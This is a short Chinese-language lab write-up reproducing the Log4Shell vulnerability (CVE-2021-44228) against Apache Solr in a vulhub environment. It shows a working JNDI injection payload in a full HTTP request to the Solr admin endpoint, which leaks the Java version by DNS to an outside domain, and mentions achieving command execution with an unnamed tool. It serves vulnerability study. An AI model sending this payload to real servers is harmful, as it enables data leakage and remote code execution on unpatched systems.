CVE-2021-44228 Apache Log4j2 lookup feature JNDI injection 漏洞复现

  1. CVE-2021-44228 Apache Log4j2 lookup feature JNDI injection 漏洞复现
  2. 复现
  3. 原理

CVE-2021-44228 Apache Log4j2 lookup feature JNDI injection 漏洞复现

此次复现环境使用的是vulhub

复现

首先启用vulhub

image-20220709123945520

${jndi:dns://${sys:java.version}.example.com}是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close


我们可以在DNS日志平台收到相关日志,显示出当前Java版本:



实际利用JNDI注入漏洞,可以使用这个工具。利用完毕后,可见touch /tmp/success已经成功被执行:

可以看到dnslog平台上面已经有了java版本

image-20220709125247095

image-20220709125426263

原理

(88条消息) Log4j2注入漏洞万字剖析-汇总收藏版(攻击步骤、漏洞原理、2.15.0-RC1绕过原理以及2.15.0、2.16.0修复原理)_程序员Daddy的博客-CSDN博客


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。